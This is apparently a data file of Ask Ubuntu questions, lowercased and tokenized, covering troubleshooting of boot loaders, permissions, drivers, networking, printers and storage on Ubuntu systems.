48:02:2a:8f:96:1a capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points telus1000 : infra , 20:76:00 : c4 : c2:18 , freq 2412 mhz , rate 54 mb/s , strength 60 wpa wpa2 metacomg01n2 : infra , 30:85 : a9 : aa:9c:58 , freq 2422 mhz , rate 54 mb/s , strength 54 wpa wpa2 rfkill list : 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no lsmod | grep rt2800 rt2800pci 18719 0 rt2800lib 79992 1 rt2800pci rt2x00pci 13287 1 rt2800pci rt2x00mmio 13603 1 rt2800pci rt2x00lib 55362 4 rt2x00pci , rt2800lib , rt2800pci , rt2x00mmio mac80211 597268 3 rt2x00lib , rt2x00pci , rt2800lib eeprom_93cx6 13344 1 rt2800pci crc_ccitt 12707 1 rt2800lib dmesg | grep rt2800 nothing came up at all
427241	need to unencrypt home folder using ubuntu virtually to access it partition	i had a problem with my ubuntu partition and it wo n't load , so i want to use my installation disc so i can access the partition inside of my disk to unencrypt and recover my files inside my partition home folder . so i want to know how to this step by step . thanks in advance .
427242	grub removal | manufacturer infinite boot screen ( hp - windows )	i have just removed grub2 with boot-repair-disk by checking the box `` restore efi backups '' that got rid of grub2 , but now everytime i boot into the computer the hp logo shows up with the animation and just keeps going . i turned secure boot off but nothing changed . if anyone has any suggestions i would be glad to hear them , thanks in advance . by the way , i tried bootrec /fixmbr and /fixboot , and still no success .
427244	ca n't get umask to work	so , i am ssh 'd into my ubuntu 12.04 server . it is running apache . i am trying to make it so that when a user logs into their account , and creates either a file or a folder , the public has the ability view the file/folder and execute it . i have edited /etc/login.defs to have a umask value of 077 , and what happens is the folder are given a permission of xxx , and the files permission of 600 . i have been trying to fix this up all day long , and have had no success . as far as i know , /etc/login.defs is the only place where i am defining the umask . the umask value set for all the users is 0002 , for some reason .
427252	can an infected dvd+rw affect a linux pc ?	yesterday i started my laptop ( using a sudoer user because i wanted to install one program ) with an infected dvd + rw inside my laptop ( it was recorded using aother computer that is infected and i guess it might be infected ) . the dvd was automatically mounted as soon as i realized the dvd was mounted i unmount it and remove it from my laptop ( no file in that dvd was opened ) , and then i reboot the laptop . i guess that it is not possible to infect a linux pc if you do n't run any file as root ( or using sudo ) , and i did not use that command before unmounting the dvd , but as i said i started my laptop using a sudoer user , and so i entered my sudo password when i logged in . the questions are : can i infect a linux pc by accidentally automounting an infected dvd while i am registered as a sudoer user ? , in case i wanted to check if the pc was infected , which changes should i check ? ( i had a look at /var/logs/apt , /usr/bin and /usr/lib and no files were modified whle the dvd was mounted ) . when i entered the user password in the log in screen , was the dvd already monted , or the system mounts the dvd after log in ? thanks . ps : i know this question might seem a bit paranoid , but it has never been asked nor answered so i think it is an interesting question to ask
427253	ubuntu server with btrfs root and confusion with the @ symbol in subvolume path	please note the following commands : user @ ubuntu : ~ $ sudo btrfs subvolume create /srv/audio create subvolume '/srv/audio' user @ ubuntu : ~ $ sudo btrfs fi show label : 'btrfs_storage ' uuid : 0042d7c1-6850-42d2-9de8-3d408642b397 total devices 3 fs bytes used 886.08gb devid 1 size 931.51gb used 478.00gb path /dev/sdd devid 3 size 1.82tb used 955.03gb path /dev/sde devid 2 size 931.51gb used 477.03gb path /dev/sdc label : 'home ' uuid : 5a869b17-5d30-462f-9abb-7095532a1994 total devices 3 fs bytes used 3.70gb devid 1 size 27.33gb used 0.00 path /dev/dm-1 devid 2 size 111.79gb used 5.03gb path /dev/sdb devid 3 size 59.63gb used 1.03gb path /dev/sda btrfs v0.20-rc1 user @ ubuntu : ~ $ sudo btrfs subvolume list / id 256 gen 17101 top level 5 path @ id 258 gen 17064 top level 5 path @ home id 261 gen 17079 top level 5 path @ apt-snapshot-release-upgrade-saucy-2013-10-20_11:17:04 id 269 gen 17100 top level 256 path srv/audio user @ ubuntu : ~ $ so , this is my first fresh installation with a btrfs root , ive used btrfs in the past with an ext4 root with mounted btrfs disks . its obvious that they are subvolumes of some sort , but i am unfamiliar with the `` @ '' symbols in the pathname . what does it signify ?
427254	using ftp to edit a file removes apache permissions	if i edit a file using ftp with vsftpd on ubuntu 12.04 lts ... it removes the permissions that allow apache to access the file ... currently if i upload a file with ftp , if it is a .php file it will show blank , if it is a .html it will give a page that says `` you do n't have permission to access /test.html on this server . '' however ... if i run sudo chmod a+rx ~ sudo chmod -r a+rx ~/public it will fix the problem ... and all files in public will be accessible to apache . but every time i edit it with ftp ... it goes back to the white page . and i have to rerun the above commands for it to work . i ca n't really wrap my head around how to fix this ...
427259	should i install apache & php separately or uninstall mysql from a lamp stack ?	i 'm developing a site for my customers to view their account transaction history , with the ability to make payments through a hosted pay-page . our legacy system requires keeping our database on-premise , so i will be connecting to mysql but wo n't need an instance of it on our web server . being new to linux and web development i 'm not sure i should try tackling the learning curve involved with configuring apache and php separately , and a bit paranoid that i will miss some of the basic security configurations that a lamp stack supposedly has preconfigured for production use . is my understanding of the security that a lamp stack has to offer correct , and would the security of it be easily maintained after uninstalling mysql ? would you generally recommend this approach for a new admin/devloper ? why ? why not ?
427263	imagemagick linking error with libfpx.so : undefined reference to	i was trying to add support for the flashpix format in my own build of imagemagick . in order to achieve this i downloaded the sources libfpx-1.3.1-3.tar.gz from the imagemagick ftp server for delegates , and compiled the sources to make 2 debian packages : libfpx and libfpx-dev . at configure time the header files are seen and usable : configure:28755 : checking for flashpix configure:28755 : checking for flashpix configure:28757 : result : configure:28768 : checking fpxlib.h usability configure:28768 : g++ -c -o3 -g3 -pthread -dmagickcore_hdri_enable=1 -dmagickcore_quantum_depth=16 conftest.cpp > & 5 configure:28768 : $ ? = 0 configure:28768 : result : yes configure:28768 : checking fpxlib.h presence configure:28768 : g++ -e -dmagickcore_hdri_enable=1 -dmagickcore_quantum_depth=16 conftest.cpp configure:28768 : $ ? = 0 configure:28768 : result : yes configure:28768 : checking for fpxlib.h configure:28768 : result : yesconfigure:28757 : result : configure:28768 : checking fpxlib.h usability configure:28768 : g++ -c -o3 -g3 -pthread -dmagickcore_hdri_enable=1 -dmagickcore_quantum_depth=16 conftest.cpp > & 5 configure:28768 : $ ? = 0 configure:28768 : result : yes configure:28768 : checking fpxlib.h presence configure:28768 : g++ -e -dmagickcore_hdri_enable=1 -dmagickcore_quantum_depth=16 conftest.cpp configure:28768 : $ ? = 0 configure:28768 : result : yes configure:28768 : checking for fpxlib.h configure:28768 : result : yes however the configtest.cpp compilation returns a linking error for undefined references within the shared library libfpx.so ( which is a symlink to libfpx.so.1.0.31 ) . it looks like most are defined in the math library which is linked by -lm . although i do n't see where the declaration # include < math.h > is in header files . in the config.log i see : checking for fpx_openimagebyfilename in -lfpx $ g++ -o conftest -o3 -g3 -pthread -dmagickcore_hdri_enable=1 -dmagickcore_quantum_depth=16 conftest.cpp -lfpx -lfftw3 -ldjvulibre -lz -lxext -lxt -lsm -lice -lx11 -lbz2 -lgomp -lm > & 5 /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/libfpx.so : undefined reference to `operator delete ( void* ) ' /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/libfpx.so : undefined reference to `operator new [ ] ( unsigned long ) ' /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/libfpx.so : undefined reference to `atan2' /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/libfpx.so : undefined reference to `std : :ios_base : :init : :~init ( ) ' /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/libfpx.so : undefined reference to `__cxa_pure_virtual' /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/libfpx.so : undefined reference to `operator delete [ ] ( void* ) ' /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/libfpx.so : undefined reference to `__gxx_personality_v0' /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/libfpx.so : undefined reference to `std : :ios_base : :init : :init ( ) ' /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/libfpx.so : undefined reference to `vtable for __cxxabiv1 : :__si_class_type_info' /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/libfpx.so : undefined reference to `pow' /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/libfpx.so : undefined reference to `operator new ( unsigned long ) ' /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/libfpx.so : undefined reference to `sqrt' /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/libfpx.so : undefined reference to `sincosf' /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/libfpx.so : undefined reference to `vtable for __cxxabiv1 : :__class_type_info' /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/libfpx.so : undefined reference to `vtable for __cxxabiv1 : :__vmi_class_type_info' collect2 : ld returned 1 exit status here is the conftest.cpp file for reference : /* confdefs.h */ # define package_name `` imagemagick '' # define package_tarname `` imagemagick '' # define package_version `` 6.8.6-10 '' # define package_string `` imagemagick 6.8.6-10 '' # define package_bugreport `` http : //www.imagemagick.org '' # define package_url `` '' # define magick_target_cpu x86_64 # define magick_target_vendor unknown # define magick_target_os linux-gnu # define package `` imagemagick '' # define version `` 6.8.6-10 '' # define stdc_headers 1 # define have_sys_types_h 1 # define have_sys_stat_h 1 # define have_stdlib_h 1 # define have_string_h 1 # define have_memory_h 1 # define have_strings_h 1 # define have_inttypes_h 1 # define have_stdint_h 1 # define have_unistd_h 1 # define __extensions__ 1 # define _all_source 1 # define _gnu_source 1 # define _posix_pthread_semantics 1 # define _tandem_source 1 # define have___attribute__ 1 # define have_pthread_prio_inherit 1 # define have_pthread 1 # define thread_support 1 # define have_pthread_prio_inherit 1 # define have_pthread 1 # define have_fseeko 1 # define have_dlfcn_h 1 # define lt_objdir `` .libs/ '' # define installed_support 1 # define cipher_support 1 # define hdri_enable_obsolete_in_h 1 # define quantum_depth_obsolete_in_h 16 # define stdc_headers 1 # define have_dirent_h 1 # define have_arpa_inet_h 1 # define have_complex_h 1 # define have_errno_h 1 # define have_fcntl_h 1 # define have_limits_h 1 # define have_linux_unistd_h 1 # define have_locale_h 1 # define have_netinet_in_h 1 # define have_stdarg_h 1 # define have_sys_ipc_h 1 # define have_sys_mman_h 1 # define have_sys_resource_h 1 # define have_sys_socket_h 1 # define have_sys_time_h 1 # define have_sys_timeb_h 1 # define have_sys_times_h 1 # define have_sys_wait_h 1 # define have_wchar_h 1 # define have_xlocale_h 1 # define have__bool 1 # define have_stdbool_h 1 # define have_stringize 1 # define time_with_sys_time 1 # define have_struct_tm_tm_zone 1 # define have_tm_zone 1 # define restrict __restrict # define have_unsigned_long_long_int 1 # define have_long_long_int 1 # define have_intmax_t 1 # define have_intptr_t 1 # define have_long_double 1 # define have_long_double_wider 1 # define have_long_long_int 1 # define have_mbstate_t 1 # define have_uintmax_t 1 # define have_uintptr_t 1 # define have_unsigned_long_long_int 1 # define have_float_t 1 # define have_double_t 1 # define sizeof_float_t 4 # define sizeof_double_t 8 # define sizeof_float 4 # define sizeof_double 8 # define sizeof_long_double 16 # define sizeof_signed_short 2 # define sizeof_unsigned_short 2 # define sizeof_signed_int 4 # define sizeof_unsigned_int 4 # define sizeof_signed_long 8 # define sizeof_unsigned_long 8 # define sizeof_signed_long_long 8 # define sizeof_unsigned_long_long 8 # define sizeof_off_t 8 # define sizeof_size_t 8 # define sizeof_ssize_t 8 # define sizeof_unsigned_intp 8 # define have_stdlib_h 1 # define have_unistd_h 1 # define have_sys_param_h 1 # define have_getpagesize 1 # define have_mmap 1 # define have_fork 1 # define have_vfork 1 # define have_working_vfork 1 # define have_working_fork 1 # define have_sys_select_h 1 # define have_sys_socket_h 1 # define select_type_arg1 int # define select_type_arg234 ( fd_set * ) # define select_type_arg5 ( struct timeval * ) # define retsigtype void # define have_decl_strerror_r 1 # define have_strerror_r 1 # define strerror_r_char_p 1 # define have_vprintf 1 # define have_socket 1 # define have_acosh 1 # define have_asinh 1 # define have_atanh 1 # define have_atoll 1 # define have_atexit 1 # define have_cabs 1 # define have_carg 1 # define have_cimag 1 # define have_creal 1 # define have_clock 1 # define have_ctime_r 1 # define have__exit 1 # define have_execvp 1 # define have_fchmod 1 # define have_floor 1 # define have_fork 1 # define have_ftime 1 # define have_ftruncate 1 # define have_getc_unlocked 1 # define have_getcwd 1 # define have_getpid 1 # define have_getdtablesize 1 # define have_getpagesize 1 # define have_getrlimit 1 # define have_getrusage 1 # define have_gettimeofday 1 # define have_gmtime_r 1 # define have_isnan 1 # define have_j0 1 # define have_j1 1 # define have_localtime_r 1 # define have_lstat 1 # define have_memmove 1 # define have_memset 1 # define have_mkstemp 1 # define have_munmap 1 # define have_nanosleep 1 # define have_newlocale 1 # define have_pclose 1 # define have_poll 1 # define have_popen 1 # define have_posix_fadvise 1 # define have_posix_fallocate 1 # define have_posix_madvise 1 # define have_posix_memalign 1 # define have_posix_spawnp 1 # define have_pow 1 # define have_pread 1 # define have_pwrite 1 # define have_qsort_r 1 # define have_raise 1 # define have_rand_r 1 # define have_readlink 1 # define have_readdir_r 1 # define have_realpath 1 # define have_select 1 # define have_seekdir 1 # define have_setlocale 1 # define have_socket 1 # define have_sqrt 1 # define have_setvbuf 1 # define have_stat 1 # define have_strchr 1 # define have_strerror_r 1 # define have_strrchr 1 # define have_strcspn 1 # define have_strdup 1 # define have_strpbrk 1 # define have_strspn 1 # define have_strstr 1 # define have_strtod 1 # define have_strtod_l 1 # define have_strtol 1 # define have_strtoul 1 # define have_symlink 1 # define have_sysconf 1 # define have_sigemptyset 1 # define have_sigaction 1 # define have_strerror 1 # define have_strcasecmp 1 # define have_strncasecmp 1 # define have_telldir 1 # define have_tempnam 1 # define have_times 1 # define have_uselocale 1 # define have_usleep 1 # define have_utime 1 # define have_vfprintf 1 # define have_vsprintf 1 # define have_vsnprintf 1 # define have_waitpid 1 # define have_clock_gettime 1 # define have_clock_realtime 1 # define have_decl_pread 1 # define have_decl_pwrite 1 # define have_decl_strlcpy 0 # define have_decl_vsnprintf 1 # define have_bool /**/ # define have_namespaces /**/ # define have_namespace_std /**/ # define have_std_libs /**/ # define x11_configure_path `` '' # define bzlib_delegate 1 # define x11_delegate 1 # define have_shared_memory 1 # define have_shape 1 # define zlib_delegate 1 # define djvu_delegate 1 # define fftw_delegate 1 /* end confdefs.h . */ /* override any gcc internal prototype to avoid an error . use char because int might match the return type of a gcc builtin and then its argument prototype would still apply . */ # ifdef __cplusplus extern `` c '' # endif char fpx_openimagebyfilename ( ) ; int main ( ) { return fpx_openimagebyfilename ( ) ; ; return 0 ; } imagemagicks told me they built successfuly on a fedora linux . as well they are unable to provide support . i do n't see where the linking error originate .
427266	how to create efi partition and install grub2 on second disk	i have two disks , one win 8 and one ubuntu . when manually partitioning the 2nd disk during the ubuntu install , i installed the bootloader to the mbr instead of creating an efi boot partition . so now i ca n't use my 2nd disk as the primary boot drive - it just goes straight to windows . how can i create an efi partition on my ubuntu drive and get grub on there ? is this something boot-repair can do ? which options would i use ? thanks in advance .
427267	virtualising ubuntu-server on ubuntu using qemu	i successfully created an qemu image containing ubuntu-server . i installed that image server instance using the `` normal '' option . when i boot up the image using qemu ubuntu-server-13.10.img -boot c -m 2000 -enable-kvm first grub appeares . if i choose `` advanced options for ubuntu '' and boot , the system dies at the stage `` loading intial ramdisk '' guest os is kubuntu 13.10 64bit , with latest updates , i created the image with qemu-system-x86_64 .
427268	usb soundcard fast track c400	i have been trying to make my m-audio/avid fast track c400 external soundcard work on my machine . i get sound from its outs but the sound is very low and if i raise the `` pcm '' in alsamixer ( which starts at 00 ) i can get decent volume but the sound is awfull . for some reason the computer assumes that the soundcard only uses various surround sound setups but i only use either two studio monitors or my headphones . furthermore , in the alsamixer i dont get any master level i only get a huge amount of outs and effects and these `` pcm '' channels . yesterday i removed pulseaudio and yet the trouble remains . my ultimate question now is does anyone think i can actually find a solution or do you think this is a driver issue that depends only on the manufacturer ? kernel : 3.11.0-17-generic
427280	terminal not working . prompt gone !	i 've closed the terminal killing a process , after that when opening a new terminal the prompt was n't there . after searching online other questions , with ctrl-c y get the prompt back . however , when opening a new terminal the prompt is gone again . i 've tried the following code : ^cmartin @ martin-n550jv : ~ $ martin @ martin-n550jv : ~ $ ps pid tty time cmd 17626 pts/0 00:00:02 bash 20957 pts/0 00:00:00 ps martin @ martin-n550jv : ~ $ sudo kill 20957 [ sudo ] password for martin : martin @ martin-n550jv : ~ $ sudo kill 17626 martin @ martin-n550jv : ~ $ taken from this site i 've also uninstalled and then re-installed the terminal , with no success . is there a solution for this ?
427286	how to combine two enviroment variables into one command ?	i have an old pc and i installed ubuntu 13 . 10 on it . i also installed skype and the issue is that i have a huge audio latency or my webcam not work . i have work by replace 'exec=skype ' with : audio fix : exec=env pulse_latency_msec=60 skype % u webcam fix : exec=bash -c 'ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so skype ' on sudo gedit /usr/share/applications/skype.desktop . i used 1 or other and not both . i want to know if i can do something like : exec=bash -c 'ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so skype ' & & env pulse_latency_msec=60 skype % u` does the ' & & ' command make bash and env command to run simultaneously or is a better way on how to write it ?
427292	how to specify samba network adapter	this question might sound crazy , and maybe it is . my folder share can only be accessed through the ip address which corresponds to my wireless adapter . if someone tried to access the share through the ip address which corresponds to the wired adapter , they wo n't see it . i have a samba share set up like the following : [ myshare ] path = /media/myshare available = yes writeable = yes browsable = yes guest ok = yes read only = no create mask = 0755 the global section contains wins support = yes recently i have had to disable my wireless adapter . unfortunately , there is no longer a way to access this share . i was under the impression samba would allow access through any network connection . does anyone know the reason for this behavior ? do i need to explicitly tell samba which ip address or network adapter it should be using ?
427297	uninstall epson xp205 wireless printer	i have been having trouble with this printer for about 4 weeks now . submitted an earlier post plus the solution that i eventually found which appeared to resolve the issue . a couple of days later it stopped working again . after many hours over several days i got it working again but when i tired to print today it had stopped working again . after getting it going last time i detailed all the successful settings and checked that they were all correct , but ubuntu/cups had changed them . re-input exactly the same settings that had been successful but no joy . initially , when i first installed it 8 months ago it worked straight out of the box with no problems at all until recently . the scanner works ok and ubuntu recognises it ok . anyway i would like to try to un-install and then reinstall . please could anyone give me a pointer in how to un-install . thanks . the problems occurred after i upgraded to 13.10 .
427299	access windows 2008 server through remote desktop	i just installed ubuntu 13.10 on a new laptop someone gave me , because i 've always wanted to learn . i 've had an easy time so far , but i need to access my work 's windows 2008 server . i have scoured the internet for answers but have n't had any luck . i can access it using remote desktop connection with any windows , but not ubuntu . all i know is that ( on windows ) the computer is heartland.zapto.org i do n't know server ip 's or anything
427304	why does my xubuntu os have so many problems , since i migrated from win xp ?	i am a first time poster on this forum . i recently installed xubuntu 13.10 on my dell 8200 desktop . i was previously running windows xp with no performance problems at all . i decided to wipe xp and do a clean xubuntu install . since then , i’ve had nothing but problems . it now runs way slower than xp . youtube videos won’t even begin to play . most previews of my document icons don’t show , and those that do , disappear when the mouse hovers over them . on youtube , items listed in a dropdown menu disappear when i hover the mouse over them . my system summary is as follows : mainboard : dell computer corporation dimension 8200 chipset : intel i850 processor : intel pentium 4 @ 1800 mhz physical memory : 2048 mb ( 4 x 512 rdram ) video card : nvidia geforce2 mx/mx 400 hard disk : maxtor ( 80 gb ) dvd-rom drive : samsung cdrw/dvd sm-308b monitor type : dell computer dell e178fp - 17 inches network card : dm9102/a/af , dm9801 fast ethernet adapter operating system : microsoft windows xp home edition 5.01.2600 directx : version 0.0
427306	increase minimum user password length ?	for security reason i would like to enforce users to set 10 character password length . how can i modify this policy ?
427311	how to setup dual shock 4 controller with ubuntu 13.10 ?	sup community ! i got my first ever nas box with ubuntu , installed steam got invited to the game streaming beta ! so i went all out and setup gigabit switches all around my network ( its huge ) , it works flawlessly ! no lag ! so in order to improve the experience i got a dual shock 4 controller . i know its possible to play with it , can anyone help me by holding my hand through this ? im a linux noob , i have a bluetooth dongle thats supported and thats about it . any ideas ? in return ill post a video of the entire setup playing crysis 3 : )
427313	problems with wireless 12.04 firmware install on samsung ativ book 9 plus	i am having trouble with the wireless connection on ubuntu 12.04 . this is the output i get with the command sudo lshw -c network : pci ( sysfs ) *-network unclaimed description : network controller product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 6b width : 64 bits clock : 33mhz capabilities : pm msi pciexpress cap_list configuration : latency=0 resources : memory : f7d00000-f7d01fff *-network disabled description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 0c serial : 18:67 : b0 : cd:04 : c0 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full latency=0 link=no multicast=yes port=mii speed=1gbit/s resources : irq:61 ioport : e000 ( size=256 ) memory : f7c00000-f7c00fff memory : f0000000-f0003fff with dmesg | grep iwl i get : [ 1.355899 ] iwlwifi 0000:02:00.0 : enabling device ( 0000 - > 0002 ) [ 1.355966 ] iwlwifi 0000:02:00.0 : ca n't disable aspm ; os does n't have aspm control [ 1.356024 ] iwlwifi 0000:02:00.0 : irq 62 for msi/msi-x [ 1.564108 ] iwlwifi 0000:02:00.0 : request for firmware file 'iwlwifi-7260-7.ucode ' failed . [ 1.564111 ] iwlwifi 0000:02:00.0 : no suitable firmware found ! [ 141.532004 ] modules linked in : hid_multitouch usbhid hid uvcvideo videobuf2_core videodev videobuf2_vmalloc videobuf2_memops btusb snd_hda_codec_hdmi snd_hda_codec_realtek joydev snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device i915 psmouse serio_raw drm_kms_helper drm lpc_ich snd bnep rfcomm bluetooth i2c_algo_bit wmi parport_pc mei_me video mac_hid ppdev iwlwifi mei soundcore intel_smartconnect cfg80211 snd_page_alloc lp parport nls_iso8859_1 ahci libahci r8169 mii [ 141.532200 ] modules linked in : hid_multitouch usbhid hid uvcvideo videobuf2_core videodev videobuf2_vmalloc videobuf2_memops btusb snd_hda_codec_hdmi snd_hda_codec_realtek joydev snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device i915 psmouse serio_raw drm_kms_helper drm lpc_ich snd bnep rfcomm bluetooth i2c_algo_bit wmi parport_pc mei_me video mac_hid ppdev iwlwifi mei soundcore intel_smartconnect cfg80211 snd_page_alloc lp parport i downloaded iwlwifi-7260-7.ucode and am trying to put it into /lib/firmware but am getting the message 'permission denied ' , i 've tried doing this with sudo with the same result . is this what i am supposed to be doing ? any help would be greatly appreciated , thanks .
427318	how can i install a debug build for coreutils ?	i am trying to install the debug build for coreutils package which is not available . i also went through this link and followed all steps but i still ca n't see a debug package for coreutils on doing apt-get policy coreutils . is debug package for coreutils really available ? if yes how can i download them ?
427320	is there a football game ( like fifa or pes ) ?	i 've downloaded 0ad , and it seems great , i 'd love if there was a football ( soccer ) game as good as 0ad , like fifa or pes , i 've seen gameplay football , but do n't know how to install , and if it is safe , because it 's not in the official respositories . thanks .
427322	how to release all ip addresses in my lan network	i have ~100 clients on my lan . when they get turned on simultaneously many seem to get assigned the same ip addresses . - i use dhcp how can i get them get ubuntu to release all the currently assigned ips address in my lan ( some clients are still stuck with the same ip address ) and have the clients renew unique ip addresses ? thanks ubuntu gurus .
427324	messed up with libudev files and now i ca n't boot	so i wanted to test cgminer on ubuntu and i was getting an error message about missing libudev file so in a rush i tried to read a few answers on here but instead of fixing it , i just messed up things more . now when i restarted my pc i ca n't even boot into ubuntu . in recovery mode the error is this : mountall : error while loading shared libraries libudev.so.0 can not open shared object file : no such file or directory so i returned to console and tried to see history of what i messed up . these are the commands that i used when i messed up things about libudev . sudo ln -sf /lib/x86_64-linux-gnu/libudev.so.1 /lib/x86_64-linux-gnu/libudev.so.0 cd /lib/x86_64-linux-gnu/ sudo ln -sf libudev.so.1 libudev.so.0 sudo cp libudev.so.0.13.0 libudev.so.1 so it looks like i overwrote some functional file or linked to some missing file but i do n't know what to do because any thing that i try while i 'm in recovery is telling me error that files are locked and it 's read-only file no matter if i 'm with root or my username .
427326	upgrade to 3.5.0.45-generic causes username character input at login prompt to be special characters	after upgrading 12.04.4 lts ubuntu server to version 3.5.0.45-generic , i see the login prompt input characters ( username input ) as special characters . i was unable to login since the username was not taken . i am not sure why this happened . never happened in the older versions . i had to revert back to an older version 3.5.0.43-generic to login . using this older version , i upgraded the kernel to 3.5.0.46-generic and the same problem persists .
427327	is there any issue if we keep using an old unsupported ubuntu release ( e.g . 13.04 ) ?	i did install an ubuntu release 13.04 recently alongside windows 7 . i tried to update langugae support then , but could not download all related package for the same may be because it was not available ( some packages were showing 0 % downloads even though i did wait for so long . so , anyone please tell me what all could be the major issues if we keep on using an unsupported release of ubuntu . thanks : ) -
427328	how to clean swap space in ubuntu 12.04	i have a computer with ubuntu 12.04 installed . unfortunately , when i run a memory taking program , it fills the ram and uses the swap space . then after the program terminates , the memory is completely released , but a considerable portion of the swap is occupied and i have to restart my computer to release that part . the program does not have memory leak . is there any way to clean that swap ? why such thing happens ? ( i regularly install the updates )
427329	why do fonts look bad in some applications ?	my eclipse ide looks horrible ever since i installed xubuntu . this question was never answered , but it 's exactly what i have trouble with : fonts look bad in microsoft office using wine my eclipse font is also a windows font consolas . i 'm really used to it , and i 'd love to get it back . edit : here 's another unanswered question related to windows fonts : fonts in google earth look bad even after installing microsoft fonts .
427330	installer encountered an unrecoverable error	i tried installing ubuntu 13.10 on my dell inspiron 5520 laptop and right after connecting to wifi i got this message , âthe installer encountered an unrecoverable error . a desktop session will now be run so you may investigate the problem or try installing again.â i used a bootable usb made by rufus and universal usb installer and both times i face the same problem . i have also checked md5sum and it checks out fine . earlier i had installed ubuntu 12.04 lts which did n't connect to internet at all , so i upgraded it as someone told me my machine was n't compatible with 12.04 , but it is still not working . please help me to resolve the problem .
427333	can not block site through /etc/hosts	i 'm trying to block site with configuring /etc/hosts file . sudo sh -c 'echo `` 0.0.0.0 http : //youtube.com '' > > /etc/hosts' but i still can access youtube from browser ( s ) . even i changed the domain to 127.0.0.1 but it did n't work .
427338	printer problem using ubuntu 12.10 and photosmart 6510	i am using ubuntu 12.10 and my computer will not print out anything from online like e-mails , even in printer friendly form . i have to either save to documents and then print ( does n't always work ) or cut and paste into libre office writer and then print . the previous version of linux did n't have this problem . i 'm using a hp photosmart 6510 that is wired in via usb . how can i get the printer to print stuff from online ? currently it tries then stops the print job saying the filter failed .
427340	how to fix usb installation which stops at purple screen with white bar after additional components are loaded ?	i 'm going to install ubuntu linux 12.04.4 lts server . i used the startup disk creator on ubuntu linux desktop to create the iso on a usb drive . the installation process stops at a purple screen with a white bar that can be typed in . it stops after the additional components are loaded . how can i fix this ?
427343	moved from japan to the us , how do i update apt-get to use local repositories ?	i moved from japan to the us recently , and using apt-get has been really slow since . it should have been obvious , but i noticed that it 's getting everything from japanese servers , which must be the reason . how can i update this ?
427344	connected to wifi ap but no internet connection	i 'm getting intermittent problems with internet access on my ubuntu 12.04 lts desktop when connected to my prolink wifi router . i have android devices connected to the same router that are working fine so i know the router is n't the problem . while connected , i 'm able to ping my own ip address as well as 127.0.0.1 , but i 'm unable to ping other devices in the same network , nor are other devices able to ping me . i 'm also unable to ping 8.8.8.8 . any idea how i can fix this problem ? thanks .
427348	the volume boot has only 40mb disk space remaining	when i install the software updates with `` update manager '' , there is a pop up alert which tells me `` the volume `` boot '' has only 0 byte disk space remaining run sudo fdisk -l in a terminal , and output : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0c7a859b device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 280451071 140122112 7 hpfs/ntfs/exfat /dev/sda3 280451072 618371071 168960000 7 hpfs/ntfs/exfat /dev/sda4 618373118 976768064 179197473+ f w95 ext 'd ( lba ) /dev/sda5 763730163 976768064 106518951 7 hpfs/ntfs/exfat /dev/sda6 618373120 626370559 3998720 83 linux /dev/sda7 626372608 630370303 1998848 82 linux swap / solaris 63.59 gb space **free** after /dev/sda7 lsblk output : name maj : min rm size ro type mountpoint sda 8:0 0 465.8g 0 disk ├─sda1 8:1 0 100m 0 part ├─sda2 8:2 0 133.6g 0 part ├─sda3 8:3 0 161.1g 0 part ├─sda4 8:4 0 1k 0 part ├─sda5 8:5 0 101.6g 0 part ├─sda6 8:6 0 3.8g 0 part / └─sda7 8:7 0 1.9g 0 part [ swap ] sr0 11:0 1 1024m 0 rom
427351	warning fstab message	recently upgraded to 64 bit computer with eufi loaded ubuntu vers 13.10 ( 64bit ) sudo gedit /etc/fstab produces the following : - ( gedit 1999 ) warning : could not load gedit repository : typelib for namespace 'gtk source' version '3.0 ' not found . also ( gedit 1999 ) ibus-warning : the owner of /home/robert/.config/ibus/bus is not the owner . i have previously added hdd 's to my 32bit machine without encountering any problems . any clues ? is it eufi , 64bit , or am i just too old ?
